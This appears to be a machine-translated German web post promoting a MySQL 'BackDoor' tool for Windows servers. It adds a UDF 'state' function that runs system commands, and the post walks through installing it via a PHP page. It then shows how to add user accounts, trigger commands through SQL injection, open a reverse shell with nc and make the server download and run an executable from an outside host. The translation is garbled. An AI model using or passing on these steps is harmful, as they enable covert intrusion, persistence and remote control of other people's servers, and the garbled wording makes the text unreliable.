Mysql BackDoor
Quelle: Puri Manchester
Der MySQL BackDoor war eine Hintertür für die Entwicklung von PHP + MySQL-Server für MySQL nach der Hintertür zu installieren hinzufügen "Staat" Funktion ausführen können System-Befehle, und beginnen Sie mit dem Mysql-Prozess basiert die Dll Sniffer Art Hintertür, clever umgesetzt kein Port, kein Prozess, keine Dienste durch die Wand Trojan. Programm unter WinXP WIN2003 + MYSQL5.0.X, und unter-Pass.
Die Installation wird mit der PHP-Server verteilt mysql.php, nach in der Host-User-Passwort-DB zu füllen, auf "Auto-Installation von MySQL Hintertür" klicken
Nach erfolgreicher Installation, würde MySQL von einem "Staat"-Funktion erhöht werden, während die Mysql-Prozess läuft ein Schnüffeln die Hintertür dieses Backdoor in Windows-System hat die gleichen Privilegien und Mysql.
Die Verwendung von staatlichen Aufgaben
Staatliche Funktion ist eigentlich eine PHP-Funktion system () "-Funktion die gleiche Funktion verwendet werden, um System-Befehle auszuführen Bitte geben Sie die SQL-Befehl:." Office und füllen Sie das MySQL-Anweisung ausgeführt werden, wie z. B. "Wählen Sie den Zustand (" der net user nohack / add Ausführen von SQL-Anweisungen werden die Ergebnisse laufen "), auf die Schaltfläche".
Mit der Staat Funktion basiert Sniff die Hintertür, auch wenn WebShell verloren, wie lange der Server, SQL-Injection-Punkt, wir können durch Injektion. PHP? ID = 1 und Zustand ('net user') "-Methode auf dem Server ausgeführt .? Der Befehl jedoch, wenn die Einstichstelle ist nicht es wir immer noch nennen Sniff die Hintertür Kontroll-Server geschickt, um jeden Port des Servers und offen für die Mysql-"der Anfang des Pakets, in der Lage, rufen die die Hintertür, wie zu schnuppern.:
Ein laufendes System Befehl: nc von der IP-80 -> Enter -> MySQL-cmd / c das net user abc / add> c :/ log.txt, (Hinweis: "!" Die letzte kann nicht ausgelassen werden)
2 20082 Anschluss der Schale auf den lokalen Server Bounce: erste Lauf von der NC-LP 20 082 auf der Maschine 20082 Port zu überwachen, und dann von der IP-nc 80 -> Enter -> MySQL-c -> Enter
Lassen Sie den Server herunter: von NC-IP-80 -> Enter -> MySQL-http :/ / www.x.com das / door.exe-c mydoor.exe (Achtung: letzte "Kann nicht ausgelassen werden)
Neben dem Versand der "MySQL-C-", das andere ist Befehl kein Echo, sondern die entsprechenden Befehle auf dem Server ausgeführt.
Deinstallieren von MySQL auf der Flucht "Drop-Funktion state" kann entladen werden, aber zur gleichen Zeit bewirkt, dass der MySQL-Prozess zu beenden, zurück zum normalen nach einem Neustart.










































157 Trackback (s)
Sie müssen eingeloggt um einen Kommentar abzugeben.